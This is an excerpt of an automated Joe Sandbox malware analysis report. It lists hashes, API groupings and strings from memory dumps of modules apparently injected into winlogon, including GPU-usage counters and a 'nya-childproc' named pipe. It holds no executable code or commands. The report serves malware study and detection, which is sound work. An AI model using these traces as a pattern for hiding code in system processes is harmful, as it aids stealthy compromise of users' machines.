                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 5751C439700F2471EE15DBAEA8183A52391BB58BB2F688725AE3D873C0EF38D445C641
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                           • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 3a645e500603d2e49c7852b303aca20d04d2f933c99b688e966e8a5f8d7bf780
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: E731D92A618E64B7E721CFA6A80C799B3A0FB88FD6F548525DE4943624EF38C455C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 3504f38e38e3fa029f540fcbe78c44e127b7d15fadd191a2f84b1cdbf063186f
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 7631D726600F60B7F725DF9AA80C759A3A0FF88FD6F548525DE8943AA8EF38C455C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 8ede8dfb4b41c7f54769feaf922c09e47b5f9363491bd1bbccb34bf8f014b086
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 8E31D926604E60BAE721CF96A80C799A3A1FB98FD7F548525DE4D83724EF38C555C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: b10aa90a55d6ea0055f526c5676bc37cc43534038bcf9b837f612d60fdfb5a2b
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: A931A539628F69A6E714EFAAA84C76973A0F784F96F548035DE4B43724EF38C451C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: f704ab49293cf0e1ed31e914e4fc4bc4390b61966030aa4b8452262fc6a64487
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: C731A539610F65A6F710DFAAA84876973A0FB84F96F548435DE4A43BA4EF38C441C701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 9f3a192e19782f68c0455e06215ffa57fe3f949edc512479bfcf280111965ae0
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: C7319339A10F65A6E750DFAAA84C76963E1F794F96F548025DE4A83724EF38C445C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: 40962d9037238da081206475ee908ce105132769ad07b7c55dbda3703558f768
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 00D1D43A60CFA0AAEB20DFA9D44839D37A5F745789F248155EF8A57B9ADB34C481C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: a8fece186d101b847eca8a083d65235070164d711131e7fc5df78026c09f9aa6
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 90D1C13A604FA0AAFB20DFA9D44839D37A0F74579AF209905EE8957FDADB34C591C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: e4e77bec6c3c76eda267b5a64cd10531dc381910f999623d3e16d62803294872
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 15D1B436604FA0AAEB20DFADD44839D77A0F755789F349116EF8997B9ACB34C481CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: e1890204962555f878dae4d699df8c2ef2e4cf9b7c5c3e4ddc42fda6e9e5fbcd
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: C1D1C43A605F90A6EF60DFA9D4883AD77E0F74978BF148205EE8957B9ADB34C085C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: ececaa4767ccb3dcc2047e64bec21184c4e63965f1cad86239683dd7ac3fee11
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 07418337218F94D6E760CF65E44879E77A1F388B99F548115DB8A07758EF38C449CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 4c20dfc4af8bda4208fe4ae9ad067bd992ae1cd645f02af2b9241ee9954499fc
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 94418137214F90DAE760CF65E45839E77B1F388B99F448115DA890BB98DF38C449CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: d71e7553ea6a1f3aca9db5fdb5635cc43e37d640ac58699523fa530d5dd3bff1
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 33419277214F90EAE760CF65E44839E77A1F388B9AF548129DB8947758EF38C849CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: d2138c8d4f7d3247c7ae02ff7a74c34891107d2cf3aecf89818fa6b04c249ee7
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 22115E3A628B5093E7108F69F41C75A7760F789BD6FA48315EA5A46BA8DF3CC144CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: ef957a4295e74cbf3163430bc7be43bd0f83cb6e2c1149b6374ee47fbb104cec
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 4C11793A614B60D2F710CF69F41875A7760F788BD6FA48311EA9A06AE8DF3CC148CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: 12dfc8dfee2a984abc70d42e87e5253ec343e094988bec53a7eb661a728d10ba
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: CE115E3A614B5093E710CF69F45875A7761F389BD6F948315EA5A42BA8DF3CC144CB40
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 7ae2038be97faaa4bf339515ed2eef7105a8bae153223ddbf86e44b63430d728
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: CB81062C61CE71A6FB50ABED944D36932D1AB96786F54C1A5DA0B87397EB38C841CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 03edbe25b19a16d78846103c908d694f2eede22f677f959411b8934aeaadb500
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 8781082C700F31BAFA519BED954D36962D0AB89787F54C9259A0857FD7EBB8CC41CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 684b0ea4b1d95b88bf2fc3b911224b566bb0b3b7a0efd3eb34d427422fe637d6
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: BC81E82D700E317AFA50EBED944D3A967E1AB9978BF74C1159A09C7397EB38C941CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 9612e62021ed5a6cd12a67d3e1815084ecf9031014c0cf66e27d2e1346f3e915
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 5A81D52C602F71A6FF549BED984D39962D0ABA6783F18C025EE4947796DF38C846CF00
